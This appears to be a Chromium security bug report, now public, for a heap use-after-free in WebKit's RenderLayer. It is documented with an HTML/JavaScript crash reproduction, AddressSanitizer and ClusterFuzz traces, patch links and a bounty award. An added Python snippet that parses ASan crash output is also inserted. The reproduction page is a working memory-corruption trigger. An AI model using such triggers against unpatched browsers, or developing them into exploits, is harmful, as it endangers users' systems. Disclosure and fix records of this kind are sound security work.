Status: Fixed
Owner:
Closed: Mar 2012
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security

Heap-use-after-free in WebCore::RenderLayer::addChild
Reported by miau...@gmail.com, Mar 11 2012

VULNERABILITY DETAILS
bug

VERSION
Chrome Version: all
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <style>
      #el1:nth-last-child(2) {
        -webkit-box-reflect: left;
        display: run-in;
      }
      #el2 {
        height: 1px;
      }
      #el2:last-child {
        -webkit-box-reflect: left;
      }
    </style>
    <script>
      onload = function() {
        el1=document.createElement('q')
        document.body.appendChild(el1)
        el1.setAttribute('id','el1')
        el1.appendChild(document.createElement('input'))
        el2=document.createElement('div')
        document.body.appendChild(el2)
        el2.setAttribute('id','el2')
        document.body.appendChild(document.createElement('img'))
        document.designMode='on'
        document.execCommand('selectall')
        document.execCommand('FormatBlock', false, '<pre>')
      }
    </script>
  </head>
  <body>
  </body>
</html>
and other variants

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: renderer
Crash State: 

==2408== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffecd2fcb0 at pc 0x55555a996d1b bp 0x7fffffff5860 sp 0x7fffffff5858
WRITE of size 8 at 0x7fffecd2fcb0 thread T0
    #0 0x55555a996d1b in WebCore::RenderLayer::removeChild(WebCore::RenderLayer*) ???:0
    #1 0x55555aa3ccf6 in WebCore::RenderObjectChildList::removeChildNode(WebCore::RenderObject*, WebCore::RenderObject*, bool) ???:0

0x7fffecd2fcb0 is located 48 bytes inside of 296-byte region [0x7fffecd2fc80,0x7fffecd2fda8)
freed by thread T0 here:
    #0 0x55555cf02b62 in free ??:0
    #1 0x55555a91328d in WebCore::RenderBoxModelObject::destroyLayer() ???:0
    #2 0x55555aa3712c in WebCore::RenderObject::willBeDestroyed() ???:0


and others..
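As an added example (not code from the original report or from ClusterFuzz), the raw AddressSanitizer output above can be reduced to the "Crash State" form that the ClusterFuzz summaries later on this bug use: crash type, faulting access, and the top frames of the crash and free stacks, with allocator frames dropped and addresses ignored so that repeated runs and the different variants group by their distinct stacks. The frame depth of 2 and the noise list are assumptions.

```python
import hashlib
import re

# Constructed sample: the ASan report quoted in the bug report above, trimmed to its frames.
ASAN_REPORT = """\
==2408== ERROR: AddressSanitizer heap-use-after-free on address 0x7fffecd2fcb0 at pc 0x55555a996d1b bp 0x7fffffff5860 sp 0x7fffffff5858
WRITE of size 8 at 0x7fffecd2fcb0 thread T0
    #0 0x55555a996d1b in WebCore::RenderLayer::removeChild(WebCore::RenderLayer*) ???:0
    #1 0x55555aa3ccf6 in WebCore::RenderObjectChildList::removeChildNode(WebCore::RenderObject*, WebCore::RenderObject*, bool) ???:0
freed by thread T0 here:
    #0 0x55555cf02b62 in free ??:0
    #1 0x55555a91328d in WebCore::RenderBoxModelObject::destroyLayer() ???:0
    #2 0x55555aa3712c in WebCore::RenderObject::willBeDestroyed() ???:0
"""
HEADER_RE = re.compile(r"AddressSanitizer:? (\S+) on address (0x[0-9a-f]+)")  # old and new ASan headers
ACCESS_RE = re.compile(r"^(READ|WRITE) of size (\d+)")
FRAME_RE = re.compile(r"^\s*#\d+ 0x[0-9a-f]+ in (.*)$")
# Allocator and sanitizer frames carry no triage signal, so the crash state skips them (assumed list).
NOISE = {"free", "malloc", "calloc", "realloc", "operator new", "operator delete"}

def _symbol(frame):
    # "Ns::Fn(Args) file:line" -> "Ns::Fn"; the source location is always the last token.
    return frame.rsplit(None, 1)[0].split("(")[0]

def parse_asan(report):
    """Crash type, faulting access and the symbols of the crash/free/alloc stacks."""
    info = {"type": None, "address": None, "access": None, "size": None, "crash": [], "free": [], "alloc": []}
    section = "crash"  # frames before any "freed by"/"previously allocated by" header
    for line in report.splitlines():
        if m := HEADER_RE.search(line):
            info["type"], info["address"] = m.group(1), m.group(2)
        elif m := ACCESS_RE.match(line):
            info["access"], info["size"] = m.group(1), int(m.group(2))
        elif line.startswith(("freed by", "previously allocated by")):
            section = "free" if line.startswith("freed") else "alloc"
        elif m := FRAME_RE.match(line):
            info[section].append(_symbol(m.group(1)))
    return info

def crash_state(info, depth=2):
    """ClusterFuzz-style state: top `depth` useful frames of the crash and free stacks (depth assumed)."""
    def top(frames):
        return [f for f in frames if f not in NOISE and not f.startswith("__")][:depth]
    return {"crash": top(info["crash"]), "free": top(info["free"])}

def dedup_key(info, depth=2):
    """Stable grouping key: heap addresses change between runs, the symbol stacks do not."""
    state = crash_state(info, depth)
    text = "|".join([info["type"] or "", info["access"] or ""] + state["crash"] + state["free"])
    return hashlib.sha256(text.encode()).hexdigest()[:16]
```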
Couldn't reproduce any of these on Chrome LKGR Trunk r126086? Did you test with the latest trunk?
Do these testcases need a page reload? That might be the reason it is not reproducing on ClusterFuzz?
Labels: -Restrict-View-SecurityTeam -Pri-0 -Area-Undefined Restrict-View-SecurityNotify Pri-1 Area-WebKit SecImpacts-Stable SecImpacts-Beta OS-All Mstone-18 Merge-Approved SecSeverity-High
Status: FixUnreleased
Ok, it crashes stable and beta, but no longer affects trunk. We need to figure out what fixed it.

Miaubiz, what was the WebKit revision you could reproduce this on? Are you still able to reproduce any variant or any of these testcases on trunk?
@miaubiz: although it's fixed, we would consider rewarding for reports like this because the information is very useful: we can use it to merge the fix back to Chrome 18. Now, if only we knew which change took care of this :)
Comment 5 Deleted
Can we get a pic of the famous miaubiz cluster one day?
Comment 7 Deleted
Comment 8 by miau...@gmail.com, Mar 15 2012
I am on
Chromium: 19.0.1070.0 (Developer Build 126778)
OS: Linux
WebKit: 536.3 (@110733)
Labels: -Restrict-View-SecurityNotify -SecImpacts-Stable -SecImpacts-Beta -Mstone-18 -Merge-Approved Restrict-View-SecurityTeam
Status: Available
Ok, one of those repros is reproing on trunk! Report coming soon. https://cluster-fuzz.appspot.com/testcase?key=26582417
Summary: Heap-use-after-free in WebCore::RenderLayer::repaintBlockSelectionGaps (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26579976

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f4b0678d8d0
Crash State:
  - crash stack -
  WebCore::RenderLayer::repaintBlockSelectionGaps
  WebCore::RenderLayer::repaintBlockSelectionGaps
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.95 Kb): https://cluster-fuzz.appspot.com/download/AMIfv942iqbUwKZ-kPNhemGz_LOxGNsnP4AxjxINloO5p_iyH0TOtIvznu_oXNHOkwcc_AC03tDFxHAr5dYFcKpfjzeB5D_ZIpv0SQEXL_ng0QBh2dCW0rt7YDBamp97o1Y5F2dsW_fZZoJsHmM2_Lb-K8_Zbgpa7A
Labels: Mstone-18 SecImpacts-Stable SecImpacts-Beta Stability-AddressSanitizer
Summary: Heap-use-after-free in WebCore::RenderLayer::removeChild (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26583069

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7f4f264a92c0
Crash State:
  - crash stack -
  WebCore::RenderLayer::removeChild
  WebCore::RenderObjectChildList::removeChildNode
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.91 Kb): https://cluster-fuzz.appspot.com/download/AMIfv94ZqLaIZV8-wtgr2toobHcO24sH82w8htykqfpkvpXGKwCUUvadjZyJcG9AU5O3aV0qB9WVnn0fLbCiy1CR8WVECBzHMXgAvnqipPq4qB6NyjJTyUSRqxXDvMVDJkAfr-0j7pSykXrqkta6W95QNd4w4hXaFA
Summary: Heap-use-after-free in WebCore::RenderLayer::repaintIncludingDescendants (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26583068

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free READ 8
Crash Address: 0x7f0a335760b0
Crash State:
  - crash stack -
  WebCore::RenderLayer::repaintIncludingDescendants
  WebCore::RenderLayer::repaintIncludingDescendants
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.86 Kb): https://cluster-fuzz.appspot.com/download/AMIfv95fxHfiUfmXFYUKQbGZsp8FjOZYjWp0V9MWSwvkVgAoyD7YZagzuFeYsFdv0lEet2uZ8Y8o4lLFJdASvVW2tVKyyv74Nm-ZREAlux2HzR5-EmLkE3qoHiqtk4TWZrX6isZZxX4wrBlAjcKJfDLx8GOrMW0Ptw
Summary: Heap-use-after-free in WebCore::RenderLayer::addChild (was: NULL)
Detailed report: https://cluster-fuzz.appspot.com/testcase?key=26582417

Uploader: inferno@chromium.org

Crash Type: Heap-use-after-free WRITE 8
Crash Address: 0x7fcc0af5c4c8
Crash State:
  - crash stack -
  WebCore::RenderLayer::addChild
  WebCore::RenderObject::addLayers
  - free stack -
  WebCore::RenderBoxModelObject::destroyLayer
  WebCore::RenderObject::willBeDestroyed
  

Minimized Testcase (0.94 Kb): https://cluster-fuzz.appspot.com/download/AMIfv97EmRdiVVBGBGyUlOtjJ5YrLAwzXA0zeFme__79Rfvjf-IrNTU9_qxmMS4MaLhJfLhDvIKAPuuD8YLJApscMKcJXE93U0HEwZGXmoVHEbzZq8KToAcjD8hpcJ3IXVdl43bBOg1Uqy7OO1xYN4hEKconn-Gq8A
Owner: infe...@chromium.org
Status: Started
Patch uploaded upstream - https://bugs.webkit.org/show_bug.cgi?id=81265
Labels: reward-topanel
Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
http://trac.webkit.org/changeset/111263
Labels: -Merge-Approved Merge-Merged
M18: http://trac.webkit.org/changeset/112465
Labels: -reward-topanel reward-1000 CVE-2011-3068 reward-unpaid
$1000 and thanks :)
Labels: -reward-unpaid
Comment 21 by cdn@chromium.org, May 15 2012
Status: Fixed
Marking old security bugs Fixed..
Project Member Comment 22 by bugdroid1@chromium.org, Oct 13 2012
Labels: Restrict-AddIssueComment-Commit
This issue has been closed for some time. No one will pay attention to new comments.
If you are seeing this bug or have new data, please click New Issue to start a new bug.
Project Member Comment 23 by bugdroid1@chromium.org, Mar 10 2013
Labels: -Type-Security -Area-WebKit -SecSeverity-High -Mstone-18 -SecImpacts-Stable -SecImpacts-Beta -Stability-AddressSanitizer Cr-Content Security-Impact-Stable Security-Impact-Beta M-18 Security-Severity-High Type-Bug-Security Performance-Memory-AddressSanitizer
Project Member Comment 24 by bugdroid1@chromium.org, Mar 13 2013
Labels: Restrict-View-EditIssue
Project Member Comment 25 by bugdroid1@chromium.org, Mar 13 2013
Labels: -Restrict-AddIssueComment-Commit Restrict-AddIssueComment-EditIssue
Labels: -Restrict-View-SecurityNotify -Restrict-View-EditIssue
Project Member Comment 27 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Severity-High Security_Severity-High
Project Member Comment 28 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Stable Security_Impact-Stable
Project Member Comment 29 by bugdroid1@chromium.org, Mar 21 2013
Labels: -Security-Impact-Beta Security_Impact-Beta
Project Member Comment 30 by bugdroid1@chromium.org, Apr 1 2013
Labels: -Performance-Memory-AddressSanitizer Stability-Memory-AddressSanitizer
Project Member Comment 31 by bugdroid1@chromium.org, Apr 6 2013
Labels: -Cr-Content Cr-Blink
Project Member Comment 32 by sheriffbot@chromium.org, Jun 14 2016
Labels: -security_impact-beta
Project Member Comment 33 by sheriffbot@chromium.org, Oct 1 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Project Member Comment 34 by sheriffbot@chromium.org, Oct 2 2016
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
Labels: allpublic